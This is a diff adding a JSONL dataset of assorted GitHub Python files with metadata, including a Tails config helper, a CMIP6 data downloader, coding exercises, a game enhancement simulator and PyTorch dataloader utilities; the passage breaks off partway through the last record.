diff --git "a/4567.jsonl" "b/4567.jsonl" new file mode 100644--- /dev/null +++ "b/4567.jsonl" @@ -0,0 +1,1515 @@ +{"seq_id":"74182821173","text":"#!/usr/bin/python3\n\nimport subprocess\nfrom pathlib import Path\n\nimport tailslib.shell\n\nbasedir = Path(\"/var/lib/live/config/\")\nvariable_to_file = {\n \"TAILS_NETWORK\": \"tails.network\",\n \"TAILS_MACSPOOF_ENABLED\": \"tails.macspoof\",\n \"TAILS_UNSAFE_BROWSER_ENABLED\": \"tails.unsafe-browser\",\n}\n\n\ndef _greeter_sh_wrapper(fname: str, variable: str) -> str:\n fpath = basedir / fname\n if not fpath.exists():\n raise ValueError(\"fname is not a valid filename\")\n shcmd = f\". '{fpath}' && echo ${variable}\"\n output = subprocess.check_output([\"/bin/sh\", \"-c\", shcmd], env={})\n return output.decode(\"ascii\")\n\n\ndef get_greeter_variable(variable: str) -> str:\n fname = variable_to_file[variable]\n return _greeter_sh_wrapper(fname, variable)\n\n\ndef get_greeter_variable_bool(variable: str) -> bool:\n v = get_greeter_variable(variable)\n return tailslib.shell.shell_value_to_bool(v)\n","repo_name":"austin987/tails","sub_path":"config/chroot_local-includes/usr/lib/python3/dist-packages/tailslib/greeter.py","file_name":"greeter.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"39131478813","text":"from runpy import run_path as r\nfrom sys import exit as e\ntry:\n choice = input(\"Select an option:\\n 1 - Command-line version\\n 2 - Graphical version\\n>:\")\nexcept KeyboardInterrupt:\n print(\"\\rExited.\")\nexcept EOFError:\n print(\"Task failed successfully.\")\nif choice == \"1\":\n path = \"rockypaper.py\"\nelif choice == \"2\":\n path = \"rockypapergui.py\"\nelse:\n print(\"Defaulting to command-line edition.\")\n path = \"rockypaper.py\"\ntry:\n while True:\n r(path_name=path)\nexcept (KeyboardInterrupt, EOFError): #if ^C\n e(\"\\nSuccessfully exited rockyPaper.\")\nexcept Exception as ename: #any other error\n e(\"\\nAn unknown error occured (%s) :/\" % ename)\n","repo_name":"TheTechRobo/rocky-paper","sub_path":"rockypaperstartup.py","file_name":"rockypaperstartup.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17172161467","text":"import xarray as xr\nimport pooch\nimport pandas as pd\nimport fsspec\nfrom pathlib import Path\nimport json\nimport dask\nimport time\nimport numpy as np\n\ndask.config.set({\"array.slicing.split_large_chunks\": True})\n\n# get esm datastore\nodie = pooch.create(\n path=\"./.cache\", # create a cache to save the pangeo csv\n base_url=\"https://storage.googleapis.com/cmip6/\",\n # The registry specifies the files that can be fetched\n registry={\n \"pangeo-cmip6.csv\": \"3431e658603318a603e78d16be5e3fa636fc6817562d06ddbf67a976925afb9c\",\n },\n)\n\nfile_path = odie.fetch(\"pangeo-cmip6.csv\")\ndf_og = pd.read_csv(file_path) # the pangeo dataframe\n\n# this line is only necessary if caching the data. 
The data will cache under .cache/files\nfs = fsspec.filesystem(\n \"filecache\",\n target_protocol=\"gs\",\n target_options={\"anon\": True},\n cache_storage=\"./.cache/files/\",\n)\n\n\ndef get_pressure_field(mod_id, ds):\n if (\n (mod_id == \"CESM2\")\n | (mod_id == \"GISS-E2-1-H\")\n | (mod_id == \"MRI-ESM2-0\")\n | (mod_id == \"BCC-ESM1\")\n ):\n ds[\"p\"] = ds.a * ds.p0 + ds.b * ds.ps\n ds = ds.drop_vars([\"a\", \"p0\", \"b\", \"ps\"])\n elif mod_id == \"UKESM1-0-LL\":\n # the pressure field for this model has units of meters. I used the formula below to convert to Pa\n # barometric formula: https://link.springer.com/article/10.1007/s40828-020-0111-6\n p0 = 101325 # Pa\n rho0 = 1.225\n g = 9.81\n h = ds.lev + ds.b * ds.orog\n p = p0 * np.exp(-(rho0 * g * h) / p0)\n ds[\"p\"] = p.expand_dims({\"time\": ds.time}, axis=0)\n ds = ds.drop_vars([\"b\", \"orog\"])\n elif mod_id == \"CanESM5\":\n ds[\"p\"] = ds.ap + ds.b * ds.ps\n ds = ds.drop_vars([\"ap\", \"b\", \"ps\"])\n return ds\n\n\ndef save_model(var_id, mod_id, exp_id):\n # the experiments with the sftlf variable don't line up with the cl variable. sftlf is a fixed variable\n # so I just chose an experiment that has sftlf for all the models.\n lp_exp_id = \"piControl\"\n\n # the path where we will save the data\n model_path = Path(\"models/\" + var_id + \"/\" + mod_id + \"_\" + exp_id + \".zarr\")\n\n # get the data for the sftlf variable: percentage of the grid cell occupied by land\n query = (\n \"variable_id=='\"\n + lp_var_id\n + \"' & experiment_id=='\"\n + lp_exp_id\n + \"' & source_id=='\"\n + mod_id\n + \"' & table_id=='\"\n + lp_monthly_table\n + \"'\"\n )\n lp_df = df_og.query(query)\n zstore_url = lp_df[\"zstore\"].values[0]\n the_mapper = fs.get_mapper(zstore_url)\n # to not use caching, replace the above line with:\n # the_mapper=fsspec.get_mapper(zstore_url)\n lp_ds = xr.open_zarr(the_mapper, consolidated=True)\n\n # get the data for the cl variable: percentage cloud cover\n query = (\n \"variable_id=='\"\n + var_id\n + \"' & experiment_id=='\"\n + exp_id\n + \"' & source_id=='\"\n + mod_id\n + \"' & table_id=='\"\n + monthly_table\n + \"'\"\n )\n cloud_df = df_og.query(query)\n zstore_url = cloud_df[\"zstore\"].values[0]\n the_mapper = fs.get_mapper(zstore_url)\n # to not use caching, replace the above line with:\n # the_mapper=fsspec.get_mapper(zstore_url)\n ds = xr.open_zarr(the_mapper, consolidated=True)\n lp_ds = lp_ds.reindex_like(ds, method=\"nearest\")\n\n if len(ds.time) > 3000:\n ds = ds.isel(time=slice(0, 3000)) # 250 years max\n\n ds = ds.where(lp_ds.sftlf == 0.0) # only values over water\n ds = ds.sel(lat=slice(21, 47), lon=slice(200, 243)) # choose specific lats, lons\n\n ds = get_pressure_field(mod_id, ds)\n ds = ds.where(ds.p < 700000, drop=False) # values where the pressure is <700hPa\n\n ds.to_zarr(model_path, mode=\"w\")\n\n\n# sea area percentage parameters:\nlp_var_id = (\n \"sftlf\" # Percentage of the grid cell occupied by land (including lakes) [%]\n)\nlp_monthly_table = \"fx\" # fixed variables\n\n# model parameters:\nvar_id = \"cl\" # percentage cloud cover\nmonthly_table = \"Amon\" # monthly atmospheric data\n\n# read in the model csv to loop over all the models to save them.\nmodels_df = pd.read_csv(\"models.csv\")\n\nquery = \"variable_id=='\" + var_id + \"'\"\nmodels = models_df.query(query).drop_duplicates([\"source_id\"])[\"source_id\"]\n\nmodel_list = [\"CESM2\", \"UKESM1-0-LL\", \"CanESM5\"]\n\n# This loops over all the models in the dict and saves them. 
Usually there is not enough space to download all of the models if the data\n# is being cached. If it runs out of space, you can delete the file folder under .cache.\n\nfor mod_id in models:\n if mod_id in model_list:\n query = \"variable_id=='\" + var_id + \"' & source_id=='\" + mod_id + \"'\"\n exp_id_list = models_df.query(query)[\"experiment_id\"].values\n\n for i in range(len(exp_id_list)):\n t0 = time.time()\n print(\"model: \" + mod_id + \" exp: \" + exp_id_list[i])\n save_model(var_id, mod_id, exp_id_list[i])\n t1 = time.time()\n print(\"model time: \" + str(t1 - t0))\n","repo_name":"phaustin/addon_containers","sub_path":"cmip6_dashdir/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6507922778","text":"\"\"\"\nA python script to uppercase vowels in string using list indexing\n\n@usage python3 list_index.py \"I am an awesome programmer\"\n\"\"\"\n\n\ndef main():\n\n # user string input stored as list\n strings = list(input(\"Enter a string: \").lower())\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n # for loop to iterate through the characters in string\n for s in range(len(strings)):\n if (strings[s] in vowels):\n upper_char = strings[s].upper() # if matches uppercase the vowel\n strings[s] = upper_char # at that index change it to uppercase\n\n # iterate over the list and print it\n print(\"your final string with vowels uppercased is: \")\n for string in strings:\n print(string, end=\"\")\n\n print(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jeethsoni/python_assignment_2","sub_path":"src/list_index.py","file_name":"list_index.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28230504076","text":"'''\nImplement a stack by two queues. The queue is first in first out (FIFO). That means you can not directly pop the last element in a queue.\n\nHave you met this question in a real interview? 
\nExample\npush(1)\npop()\npush(2)\nisEmpty() // return false\ntop() // return 2\npop()\nisEmpty() // return true\n'''\n\nfrom collections import deque\n\nclass Stack:\n def __init__(self):\n self.q1 = deque()\n self.q2 = deque()\n\n \"\"\"\n @param: x: An integer\n @return: nothing\n \"\"\"\n def push(self, x):\n # write your code here\n self.q1.append(x)\n\n \"\"\"\n @return: nothing\n \"\"\"\n def pop(self):\n # write your code here\n if self.isEmpty():\n raise Exception('pop from empty queue')\n while (len(self.q1) > 1):\n self.q2.append(self.q1.popleft())\n self.q1.popleft()\n self.q1, self.q2 = self.q2, self.q1\n\n \"\"\"\n @return: An integer\n \"\"\"\n def top(self):\n # write your code here\n if self.isEmpty():\n raise Exception('pop from empty queue')\n while (len(self.q1) > 1):\n self.q2.append(self.q1.popleft())\n res = self.q1.popleft()\n self.q2.append(res)\n self.q1, self.q2 = self.q2, self.q1\n return res\n \"\"\"\n @return: True if the stack is empty\n \"\"\"\n\n def isEmpty(self):\n # write your code here\n return len(self.q1) == 0\n\ns = Stack()\ns.push(1)\ns.pop()\ns.push(2)\nprint(s.isEmpty())\nprint(s.top())\ns.pop()\nprint(s.isEmpty())\n","repo_name":"zsmountain/lintcode","sub_path":"python/stack_queue_hash_heap/494_implement_stack_by_two_queues.py","file_name":"494_implement_stack_by_two_queues.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37363957825","text":"import sys\n\n#Python prpgram fo calculating Collatz chains.\n#Program defines a helper function as well as a Node and Chain object \n#Program will output intial value, max value and length of chain for each intial value from 1 until and user defined int\n#AUTHOR: davissmith1\n\n#helper funtion for determining if num is odd or even\n#returns True if odd, False if even\ndef isOdd(num):\n return num % 2 != 0\n\n#represents a node in the chain\nclass Node:\n def __init__(self, value, next):\n self.value = value\n self.next = next\n\n def getValue(self):\n return self.value\n\n def __str__(self):\n return str(self.value)\n\n#represents a chain of nodes\nclass Chain:\n def __init__(self, intialValue):\n self.initial = None\n self.current = None\n #total number of steps until value == 1\n self.size = 0\n #max value in chain\n self.maxValue = intialValue\n #creates node with intial value\n self.add(intialValue)\n self.createChain()\n\n #function to create chain\n def createChain(self):\n val = self.initial.value\n if val == 0:\n print('ERROR: value cannot be 0')\n \n while val != 1:\n if isOdd(val) :\n newVal = ((3*val) + 1)\n #updates maxVal is applicable\n if newVal > self.maxValue:\n self.maxValue = newVal\n #creates new node with calculated newVal\n self.add(newVal)\n \n else:\n newVal = val/2\n self.add(newVal)\n \n #iteates value to continue adding nodes\n val = self.current.value\n \n\n\n\n \n def add(self, value):\n if self.initial == None:\n self.initial = Node(value, None)\n self.current = self.initial\n else:\n self.current.next = Node(value, None)\n self.current = self.current.next\n self.size += 1\n\n def __str__(self):\n if self.initial == None:\n return \"Empty Chain\"\n chain = \"\"\n\n\ndef main(numChains):\n #list to hold all chains between 1 and user inputed value\n chains = []\n #creates chains\n for i in range(numChains):\n newChain = Chain(i+1)\n chains.append(newChain)\n for currentChain in chains:\n value = currentChain.initial.value\n maxValue = currentChain.maxValue\n size = 
currentChain.size\n #print(value+ \") max vale: \" + maxValue + \", chain length: \" + size, sep='/n')\n print(\"%d) Max Value: %d, Nodes to termination: %d\" % (value, maxValue, size))\n print(\"End of chains\")\n\nif __name__ == \"__main__\":\n #checks for correct number of arguments\n \n numberOfChains = 10\n\nmain(numberOfChains)\n \n","repo_name":"davissmith1/collatz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5787465544","text":"#-*- coding: utf-8 -*-\n'''\nStoring the abstract syntax tree types here.\nThe developer is to add the type here to add a\ncode generation function for any new AST.\n\nPGMTYPE :\n'pgm'\n\nDECLTYPE :\n'decl'\n\nBVAL :\n'bval'\n\nNUMTYPE :\n'num'\n\nEXPTYPE :\n'exp'\n\nEVENTTYPE :\n\"evnt\"\n\nATOMICTYPE :\n'atmc'\n\nASGNTYPE :\n'asgn'\n\nCONDTYPE :\n'cond'\n\nITE :\n'ite'\n\nINIT:\n'init'\n\n.. module::asttypes\n :synopsis: abstract syntax tree type list\n.. moduleauthor:: Ritwika Ghosh \n'''\nLOCAL = 0\nALLWRITE = 1\nALLREAD = 2\n\nPGMTYPE = 'pgm'\nDECLTYPE = 'decl'\nBVAL = 'bval'\nNUMTYPE = 'num'\nEXPTYPE = 'exp'\nEVENTTYPE = \"evnt\"\nATOMICTYPE = 'atmc'\nASGNTYPE = 'asgn'\nCONDTYPE = 'cond'\nINITTYPE = 'init'\nITE = 'ite'\nARITHTYPE = 'arith'\nRESTYPE = 'res'\nVARTYPE = 'var'\nNULLTYPE = 'null'\nARTYPE = 'ar'\nAWTYPE = 'aw'","repo_name":"ritwika314/Koffee","sub_path":"asttypes.py","file_name":"asttypes.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36600683865","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nwatchlist_stock = db.Table(\n 'watchlist_stock',\n db.Model.metadata,\n db.Column('watchlist_id', db.Integer, db.ForeignKey(\n add_prefix_for_prod('watchlists.id')), primary_key=True),\n db.Column('stocks_id', db.Integer, db.ForeignKey(\n add_prefix_for_prod('stocks.id')), primary_key=True)\n)\nif environment == 'production':\n watchlist_stock.schema = SCHEMA\n","repo_name":"NYDF/RobinWhod","sub_path":"app/models/watchlist_stock.py","file_name":"watchlist_stock.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25911694398","text":"#coding: utf8\nimport os\nimport yaml\nfrom collections import defaultdict\nfrom randoms import get_random_choice\nfrom http_helper import HttpHelper\nhh = HttpHelper()\n\nclass PowerUpProcessor(object):\n\n\tdef __init__(self, item_type, inputs, group_id):\n\t\tself.group_id = group_id\n\t\tself.item_type = item_type\n\t\tself.pdata = self.extract_power_up_data(item_type)\n\t\tself.get_error = False\n\t\tself.inputs = self.pdata[\"inputs\"]\n\t\tself.input_item = dict()\n\t\tself.output_item = dict()\n\t\tself.relative = self.pdata['relative']\n\t\tself.summary = self.pdata['summary']\n\t\tself.table = self.pdata['table']\n\t\tself.on_max_level = self.pdata['on_max_level']\n\t\tself.item_level = int(self.pdata.get(\"init_level\", 0))\n\t\t# 输入参数和需要参数数量不一致\n\t\tif len(inputs) != len(self.inputs):\n\t\t\tself.get_error = True\n\t\t\treturn\n\t\t# 把输入的数量存起来,判断是否超过上下限\n\t\tfor idx, ipt in enumerate(self.inputs):\n\t\t\titem_name = ipt.keys()[0]\n\t\t\titem_attrs = ipt.values()[0]\n\t\t\tif int(inputs[idx]) < item_attrs['lb'] or int(inputs[idx]) > item_attrs['ub']:\n\t\t\t\tself.get_error = True\n\t\t\t\treturn\n\t\t\tself.input_item[item_name] = 
int(inputs[idx])\n\n\tdef extract_power_up_data(self, ptype):\n\t\tori_path = r'E:\\workspace\\dn_robot\\power_ups' + '\\\\' + ptype + '.yml'\n\t\tif not os.path.isfile(ori_path):\n\t\t\treturn\n\t\tyml_data = yaml.load(open(ori_path))\n\t\treturn yml_data.get('data')\n\n\tdef upload_summary(self, item, diff_count):\n\t\t# 单个item的累加逻辑\n\n\t\titem_summary = self.summary.get(item)\n\t\t# 不需要计数的材料直接跳过\n\t\tif not item_summary:\n\t\t\treturn\n\t\tcount_type = item_summary[\"count_type\"]\n\t\t# 计数方式是累加,直接加\n\t\tif count_type == \"sum\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = 0\n\t\t\tself.output_item[item] += diff_count\n\t\tif count_type == \"max\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = 0\n\t\t\tself.output_item[item] = max(diff_count, self.output_item[item])\n\t\t# 计数方式是记分布\n\t\tif count_type == \"counter\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = defaultdict(int)\n\t\t\tdisplay_list = item_summary[\"display_list\"]\n\t\t\tif diff_count in display_list:\n\t\t\t\tself.output_item[item][diff_count] += 1\n\n\tdef apply_power_up_result(self, result):\n\t\t# 强化结果收集 消耗扣除 材料数累加 强化等级变化\n\n\t\tfor item, count in result.items():\n\t\t\t# 检查是否够强化费用\n\t\t\tif item in self.input_item:\n\t\t\t\tif self.input_item[item] + count < 0:\n\t\t\t\t\treturn False\n\t\t\t\tself.input_item[item] += count\n\t\tfor item, count in result.items():\n\t\t\t# 确认材料够\n\t\t\tif item in self.input_item:\n\t\t\t\tcontinue\n\t\t\t# 强化等级有变,可能归零\n\t\t\tif item == 'level':\n\t\t\t\tself.item_level += count\n\t\t\t\tself.item_level = max(0, self.item_level)\n\t\t\t\tself.upload_summary(\"level\", self.item_level)\n\t\t\t# 其他只可能是消耗型材料,直接上传结果\n\t\t\telse:\n\t\t\t\tself.upload_summary(item, count)\n\t\treturn True\n\n\tdef process_unable_power_up(self, init_msg=None):\n\t\t# 材料用尽时的结果通知\n\t\tmsg = [\n\t\t\tu\"强化完成,强化材料用尽,强化结果:\" if not init_msg else init_msg,\n\t\t]\n\t\t# 强化等级的分布\n\t\tfor k, v in self.summary.items():\n\t\t\tif v[\"count_type\"] == \"counter\":\n\t\t\t\toi = self.output_item.get(k)\n\t\t\t\tif not oi:\n\t\t\t\t\tmsg.append(u\"未强化到指定等级\")\n\t\t\t\telse:\n\t\t\t\t\tsub_msg = []\n\t\t\t\t\tfor level, count in sorted(oi.items()):\n\t\t\t\t\t\tsub_msg.append(u\"+%s:%s次\" % (level, count))\n\t\t\t\t\tmsg.append(u\";\".join(sub_msg))\n\t\t\tif v[\"count_type\"] == \"max\":\n\t\t\t\tmax_level = self.output_item.get(k)\n\t\t\t\tmsg.append(u\"强化至+%s\" % max_level)\n\t\t# 其他消耗材料的结果\n\t\tmsg.append(u\"消耗材料:\")\n\t\tfor k, v in self.summary.items():\n\t\t\tif v[\"count_type\"] == \"sum\":\n\t\t\t\tcount = self.output_item.get(k) or 0\n\t\t\t\tmsg.append(u\"%s:%s\" % (self.relative[k], count))\n\t\treturn hh.send_group_msg(self.group_id, u'\\n'.join(msg))\n\n\tdef send_error_message(self):\n\t\t# 提示错误输入\n\t\tmsg = [\n\t\t\tu\"输入格式:\"\n\t\t]\n\t\tformat = u\".ding %s\" % self.item_type\n\t\tfor ipt in self.inputs:\n\t\t\tipt_code = ipt.keys()[0]\n\t\t\tipt_config = ipt.values()[0]\n\t\t\tipt_name = self.relative[ipt_code]\n\t\t\tformat += u' %s数量(%s~%s)' % (ipt_name, ipt_config[\"lb\"], ipt_config[\"ub\"])\n\t\tmsg.append(format)\n\t\treturn hh.send_group_msg(self.group_id, u'\\n'.join(msg))\n\n\tdef process_max_level(self):\n\t\trests = []\n\t\tfor k, v in self.input_item.items():\n\t\t\trests.append(u\"%s: %s个\" % (self.relative[k], v))\n\t\tself.process_unable_power_up(\n\t\t\tinit_msg=u'强化完成,已到达最大等级,剩余材料:%s,强化结果:' % (\" \".join(rests))\n\t\t)\n\n\tdef process_power_up(self):\n\t\t# 进行一次强化\n\n\t\t# 
已经不能再强化了\n\t\tlevel_table = self.table.get(self.item_level)\n\t\tif not level_table:\n\t\t\treturn self.process_max_level()\n\t\tsucc_ratio = level_table[\"succ_ratio\"]\n\t\tbroken_ratio = (1 - succ_ratio) * level_table.get(\"broken_ratio\", 0)\n\t\tfail_ratio = 1 - succ_ratio - broken_ratio\n\t\t# 得到强化结果\n\t\tpower_result = get_random_choice(\n\t\t\t[succ_ratio, fail_ratio, broken_ratio],\n\t\t\t[level_table[\"succ_result\"], level_table.get(\"fail_result\", dict()), level_table.get(\"broken_result\", dict())]\n\t\t)\n\t\t# 普通强化消耗\n\t\tif not self.apply_power_up_result(level_table[\"all_result\"]):\n\t\t\treturn self.process_unable_power_up()\n\t\t# 强化结果额外消耗\n\t\tself.apply_power_up_result(power_result)\n\t\treturn True\n\n\tdef run(self):\n\t\tif self.get_error:\n\t\t\treturn self.send_error_message()\n\t\twhile True:\n\t\t\tcan_continue = self.process_power_up()\n\t\t\tif not can_continue:\n\t\t\t\tbreak\n\nif __name__ == '__main__':\n\tp = PowerUpProcessor(u'顽强', [\"100\"], 655514756)\n\tp.run()","repo_name":"Morisummer135/m_dn_robot","sub_path":"power_up.py","file_name":"power_up.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39702923676","text":"# /Users/Trevor/Documents/Scripts/batch-forge python\n# UI Script for Batch Forge\n\nimport json\nimport zipfile as zf\nfrom glob import glob\nfrom tkinter import *\nfrom tkinter import ttk\n\nfrom batch_sorting import *\nfrom wallpaper_sorter_functions import (\n checkForMultiQtySamplePdfs,\n cleanupDownloadDir,\n missing_pdf_list,\n damaged_pdf_list,\n split_pdf_list,\n parseJSON,\n reportListOfPdfs,\n sortPackagesByOrderNumber,\n sortPdfsToSortedFolders,\n splitMultiPagePDFs,\n ot_panel_unknown_list,\n)\nfrom batch_forge_config import GENERAL_VARS_HIDDEN as GVH\n\nDOWNLOAD_DIR = GVH[\"Caldera Dirs\"][\"Downloads\"]\n\n\nSORT_RESULTS = []\n\n\ndef get_sort_results() -> list:\n \"\"\"\n Accepts nothing. Returns a list containing the results of a sort function.\n \"\"\"\n result_msg_dict = {\n \"missing\": \"missing PDF. Moved to needs Attention.\",\n \"damaged\": \"damaged PDF. Moved to Needs Attention.\",\n \"illegible\": \"couldn't read OT panels. Moved to Needs Attention.\",\n \"split\": \"split into multiple files.\",\n }\n\n results_list = []\n results_list.extend(reportListOfPdfs(missing_pdf_list, result_msg_dict[\"missing\"]))\n results_list.extend(reportListOfPdfs(damaged_pdf_list, result_msg_dict[\"damaged\"]))\n results_list.extend(reportListOfPdfs(split_pdf_list, result_msg_dict[\"split\"]))\n results_list.extend(\n reportListOfPdfs(ot_panel_unknown_list, result_msg_dict[\"illegible\"])\n )\n return results_list\n\n\ndef sort_zipped_packages_window(root) -> None:\n \"\"\"\n Accepts nothing and returns nothing. Opens a window with a progress\n bar to monitor the unzipping and renaming of downloaded sort files.\n\n When done, cleans out the Downloads folder as well to keep things\n clean. If there are any results for the function, it will display\n them and wait for the user to close the window. 
Otherwise,\n automatically returns to the main menu.\n \"\"\"\n\n SORT_RESULTS = []\n\n # Initialize sort window\n window = Toplevel(root)\n window.title(\"Sort\")\n zippedPackages = sortPackagesByOrderNumber(glob(DOWNLOAD_DIR + \"*.zip\"))\n snort_label_count = len(zippedPackages)\n progress_frame = LabelFrame(window, text=\"Progress\", padx=10, pady=10, width=250)\n progress_frame.pack(padx=10, pady=10)\n\n # This is a fun easter egg for me, but is otherwise worthless.\n if snort_label_count == 67:\n snort_label = Label(\n progress_frame,\n text=f\"Now sorting {snort_label_count} orders.\\n\\n\"\n \"ALL HAIL SIXTY SEVEN\\nTHE 19TH AND HOLIEST PRIME\",\n )\n else:\n snort_label = Label(\n progress_frame, text=f\"Now sorting {snort_label_count} orders.\"\n )\n snort_label.pack(padx=10, pady=10)\n\n # Sets progress bar\n progress_bar = ttk.Progressbar(\n progress_frame, orient=\"horizontal\", length=200, mode=\"determinate\"\n )\n progress_bar.pack(pady=10, padx=20)\n\n # Sets status label\n status_label = Label(progress_frame, text=\"Working...\")\n status_label.pack()\n\n progress_bar[\"maximum\"] = snort_label_count\n\n # Begins unzipping, renaming, and sorting files\n for package in zippedPackages:\n status_label.config(text=package.split(\"/\")[-1])\n try:\n package_name = package.split(\"/\")[-1].split(\"_\")[0]\n unzip_dir = DOWNLOAD_DIR + (package_name) + \"/\"\n with zf.ZipFile(package, \"r\") as zip_ref:\n zip_ref.extractall(unzip_dir)\n except:\n unzip_error_label = Label(f\"| Couldn't unzip file: {package}\")\n unzip_error_label.pack(padx=5, pady=5)\n orderJSON = str(glob(unzip_dir + \"*.json\")).split(\"'\")[1]\n with open(orderJSON) as file:\n openJSON = json.load(file)\n parseJSON(openJSON, orderJSON, unzip_dir)\n splitMultiPagePDFs(glob(unzip_dir + \"*.pdf\"))\n checkForMultiQtySamplePdfs(glob(unzip_dir + \"*-Samp-*.pdf\"))\n try:\n sortPdfsToSortedFolders(glob(unzip_dir + \"*.pdf\"))\n except:\n SORT_RESULTS.append(f\"| Couldn't properly sort PDFs in {unzip_dir}\")\n\n progress_bar[\"value\"] += 1\n progress_frame.update_idletasks()\n\n # Updates label\n status_label.config(text=\"Done!\")\n snort_label.config(text=f\"Sorted {snort_label_count} orders.\")\n\n # Cleans out download directory of unneeded directories and folders\n cleanupDownloadDir(DOWNLOAD_DIR)\n\n # Displays sort results if any exist;\n # otherwise, closes window and returns to main menu\n SORT_RESULTS = get_sort_results()\n\n if len(SORT_RESULTS) == 0:\n window.destroy()\n else:\n results_frame = LabelFrame(window, text=\"Results\", padx=5, pady=3, width=350)\n results_frame.pack(padx=10, pady=10)\n\n for result in SORT_RESULTS:\n if \"Needs Attention\" in result:\n result_label = Label(results_frame, text=result, fg=\"red\")\n result_label.pack(anchor=\"w\", padx=1, pady=5)\n else:\n result_label = Label(results_frame, text=result)\n result_label.pack(anchor=\"w\", padx=1, pady=5)\n\n close_btn = Button(\n window,\n text=\"Return to Main Menu\",\n width=20,\n height=2,\n command=window.destroy,\n )\n close_btn.pack(padx=10, pady=10)\n","repo_name":"tnuckles/batch-forge","sub_path":"sorter_window.py","file_name":"sorter_window.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"1147064732","text":"text = input()\nelements = {}\nfor el in text:\n if not el in elements:\n elements[el] = 1\n else:\n elements[el] +=1\n\nfor key,value in sorted(elements.items(), key = lambda kvp: kvp[0]):\n print(f\"{key}: 
{value} time/s\")","repo_name":"a-angeliev/Python-Advanced-Softuni","sub_path":"Python-Advance/Exe. Tuples and Sets/4. Count Symbols.py","file_name":"4. Count Symbols.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37486861147","text":"def solution(record):\r\n result = []\r\n dict_id = {}\r\n msg_arr = []\r\n for i in record:\r\n result.append(i.split())\r\n \r\n for x in result:\r\n if len(x) == 3: # Enter와 Change의 경우 딕셔너리가 update 되야함\r\n dict_id[x[1]] = x[2]\r\n\r\n for x in result:\r\n if x[0] == \"Enter\":\r\n msg_arr.append(dict_id[x[1]]+\"님이 들어왔습니다.\")\r\n elif x[0] == \"Leave\":\r\n msg_arr.append(dict_id[x[1]]+\"님이 나갔습니다.\")\r\n \r\n return msg_arr\r\n\r\n\r\n","repo_name":"DrunkJin/CosMos","sub_path":"220704-220710/p42888/likelion-Jiyeong_p42888.py","file_name":"likelion-Jiyeong_p42888.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39678030241","text":"from collections import deque\n\nF, S, G, U, D = map(int, input().split())\n\nneed_visited = deque([[S, 0]])\nvisited = set()\n\nans = -1\n\nwhile need_visited:\n cur, counter = need_visited.popleft()\n if not cur in visited:\n visited.add(cur)\n if cur == G:\n ans = counter\n break\n if cur + U <= F:\n need_visited.append([cur + U, counter + 1])\n\n if cur - D > 0:\n need_visited.append([cur - D, counter + 1])\n\nif ans == -1:\n print('use the stairs')\nelse:\n print(ans)\n","repo_name":"gmkseta/TIL","sub_path":"Algorithm/11week/5014.py","file_name":"5014.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22001496945","text":"\"\"\"\nContains functionality for creating PyTorch DataLoaders for custom image classification data.\n\"\"\"\nimport os\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nNUM_WORKERS = os.cpu_count()\n\ndef create_dataloaders(\n train_dir: str,\n test_dir: str,\n transform: transforms.Compose,\n batch_size: int,\n num_workers: int=NUM_WORKERS\n):\n \"\"\"\n Creates training and testing DataLoaders \n Takes in training and testing directory paths and turns their contents into PyTorch datasets, and then into PyTorch DataLoaders\n \n Parameters:\n train_dir: Path to the training directory\n test_dir: Path to the testing directory\n transform: A Torchvision transform to perform on the training and testing data\n batch_size: Sample size for the batches in the DataLoaders\n num_workers: Number of workers (CPU/GPU cores) per DataLoader\n \n Returns:\n A tuple of (train_dataloader, test_dataloader, class_names).\n Where class_names is a list of the target classes.\n \"\"\"\n # Create datasets with datasets.ImageFolder()\n train_data = datasets.ImageFolder(root=train_dir, transform=transform)\n test_data = datasets.ImageFolder(root=test_dir, transform=transform)\n \n # Get class names\n class_names = train_data.classes\n \n # Transform datasets into DataLoaders\n train_dataloader = DataLoader(dataset=train_data, batch_size=batch_size, num_workers=NUM_WORKERS, shuffle=True)\n test_dataloader = DataLoader(dataset=test_data, batch_size=batch_size, num_workers=NUM_WORKERS, shuffle=False)\n \n return train_dataloader, test_dataloader, 
